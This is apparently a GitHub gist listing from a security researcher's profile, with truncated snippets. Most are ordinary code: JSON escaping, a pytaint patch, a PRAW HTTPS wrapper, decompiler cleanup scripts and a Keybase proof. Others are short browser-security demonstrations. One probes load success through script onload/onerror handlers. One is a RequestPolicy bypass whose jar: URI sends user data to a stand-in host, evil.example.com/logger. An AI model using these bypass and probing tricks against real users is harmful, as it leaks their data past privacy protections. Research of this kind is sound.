Jordan Milne JordanMilne

@JordanMilne
JordanMilne / gist:6459317
Created September 6, 2013 03:52
Demonstrates abuse of script error handling
<html>
<body>
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
<script src="http://doesntexist.example.com" onload="javascript:alert('universe exploded')" onerror="javascript:alert('doesntexist failed to load as expected')"></script>
</body>
</html>
JordanMilne / gist:7704136
Created November 29, 2013 10:48
Demonstration of a RequestPolicy bypass using jar: URIs
<img src="jar:http://evil.example.com/logger?userdata=whatever!/foobar" />
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
JordanMilne / content-type.mxml
Created January 16, 2014 21:09
setting the Content-Type header with flash
<?xml version="1.0"?>
<s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:mx="library://ns.adobe.com/flex/mx" xmlns:s="library://ns.adobe.com/flex/spark" >
<fx:Script><![CDATA[
import flash.net.*;
public function sendStuff():void
{
var r:URLRequest = new URLRequest('http://www.youtube.com/foo');
r.method = 'POST';
r.data = '{wow what a great post body}';
JordanMilne / gist:0880a229356b317f9ee0
Created July 7, 2014 07:36
JSON_HEX_TAGS-like functionality
>>> import simplejson
>>> print simplejson.dumps({"foo<>":"<>bar&"}, cls=simplejson.JSONEncoderForHTML)
{"foo\u003c\u003e": "\u003c\u003ebar\u0026"}
LF
$ ./stmd --ast foo.md
document
paragraph
str "Normal paragraph"
paragraph
str "Paragraph 2"
paragraph
str "foo "

Keybase proof

I hereby claim:

  • I am jordanmilne on github.
  • I am largenocream (https://keybase.io/largenocream) on keybase.
  • I have a public key whose fingerprint is D39D AEC8 56F2 2C2B A0ED BFC6 BADF 89BE FF6F 9ED3

To claim this, I am signing this object:

JordanMilne / pytaint.patch
Created October 21, 2014 03:28
pyenv-compatible patch for pytaint against python 2.7.5, see https://github.com/felixgr/pytaint
From 2aea5633663dd0b91d55a80a17ad22edfb23731f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Felix=20Gr=C3=B6bert?= <groebert@google.com>
Date: Mon, 7 Oct 2013 15:44:48 +0200
Subject: [PATCH 1/9] pytaint patch
---
Include/Python.h | 3 +
Include/meritobject.h | 28 +
Include/pyerrors.h | 1 +
Include/stringobject.h | 53 +-
JordanMilne / gist:04c161a5b66a087619ed
Created October 28, 2014 18:05
Support HTTPS forcing in PRAW 2
import praw
from functools import wraps
def init_wrapper(func):
    @wraps(func)
    def func_wrapper(*args, **kwargs):
        ret = func(*args, **kwargs)
        if ret:
            ret._site_url = ret._site_url.replace('http:', 'https:')
            ret._short_domain = ret._site_url.replace('http:', 'https:')
JordanMilne / find-broken.sh
Created November 4, 2014 21:20
Horrible scripts to make JD's output recompileable (for Spiral Knights, circa 2011. I'm not allowed regexes anymore.)
#!/bin/bash
#find possibly broken source files that will need to be manually fixed
( \
find ../code -type f -iname "*.java" -print0 | xargs --null grep -l '// Byte code:' && \
find ../code -type f -iname "*.java" -size 0 \
) | uniq